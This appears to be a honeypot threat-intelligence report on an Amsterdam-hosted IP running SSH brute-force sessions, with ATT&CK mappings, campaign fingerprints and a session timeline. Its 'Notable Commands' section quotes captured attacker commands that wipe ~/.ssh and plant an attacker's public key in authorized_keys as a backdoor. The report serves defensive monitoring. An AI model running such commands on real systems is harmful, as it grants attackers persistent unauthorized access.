IntrusionLabs IntrusionLabs
← Back to feed

45.156.25.130

TAGGED SUSPICIOUS how we decide →
Threat Confidence
57%
Location
🇳🇱 NL / Amsterdam
ASN
AS56971 · Cgi Global Limited
Cloud Provider
Total Events
122
Above average by volume
Agent Count
1
First / Last Seen
2026-05-24 13:05 — 2026-05-24 13:34
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Command and Control
T1105
External Corroboration
Blocklist.de
Reported 2026-05-24 15:02
blocklist_de:reported
Campaigns
HASSH f555226df196… — SSH-2.0-libssh_0.9.6 (1319 IPs, 94 countries) HASSH Active high 🇺🇸 US
1319 IPs 421050 events
ssh:bruteforce
2026-02-25 — ongoing · 1319 IPs are running an identical SSH client (HASSH fingerprint f555226df196…). Top network: Tencent Building, Kejizhongyi Avenue (AS132203). …
Session Forensics
malware_dropper ×4 credential_probe ×10 opportunistic_bruter ×4
Sessions
18 (8 with login)
Avg Depth Score
0.44
Commands Executed
12
Files Downloaded
4
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
f555226df1963d1d3c09daf865abdc9a
SSH Client
SSH-2.0-libssh_0.9.6
Evidence Timeline
Credential Probe 3d72d282c308 newark_01 · 2026-05-24 13:34
1 20%
Loading events...
Credential Probe 9f13bee06afe newark_01 · 2026-05-24 13:31
1 20%
Loading events...
Malware Dropper fd3ac05dfd99 newark_01 · 2026-05-24 13:28
3 1 1 100%
Loading events...
Opportunistic Bruter d4a31c267321 newark_01 · 2026-05-24 13:28
1 50%
Loading events...
Credential Probe dce3e70019b1 newark_01 · 2026-05-24 13:28
1 20%
Loading events...
Credential Probe 56e0bd0cc513 newark_01 · 2026-05-24 13:25
1 20%
Loading events...
Opportunistic Bruter 37da6dc31b87 newark_01 · 2026-05-24 13:21
1 50%
Loading events...
Malware Dropper e21cffc2625e newark_01 · 2026-05-24 13:21
3 1 1 100%
Loading events...
Credential Probe fba3963f73e4 newark_01 · 2026-05-24 13:21
1 20%
Loading events...
Opportunistic Bruter 9be53c0805ec newark_01 · 2026-05-24 13:18
1 50%
Loading events...
Malware Dropper 4e6367e4b8aa newark_01 · 2026-05-24 13:18
3 1 1 100%
Loading events...
Credential Probe 3bb0c60ecb90 newark_01 · 2026-05-24 13:18
1 20%
Loading events...
Credential Probe 1357ebd166ab newark_01 · 2026-05-24 13:15
1 20%
Loading events...
Malware Dropper 23d1b050e8ce newark_01 · 2026-05-24 13:13
3 1 1 100%
Loading events...
Opportunistic Bruter 9662b6ff10b8 newark_01 · 2026-05-24 13:13
1 50%
Loading events...
Credential Probe e1e8a4854225 newark_01 · 2026-05-24 13:13
1 20%
Loading events...
Credential Probe 8c396f13b787 newark_01 · 2026-05-24 13:09
1 20%
Loading events...
Credential Probe 13bf758f0737 newark_01 · 2026-05-24 13:05
1 20%
Loading events...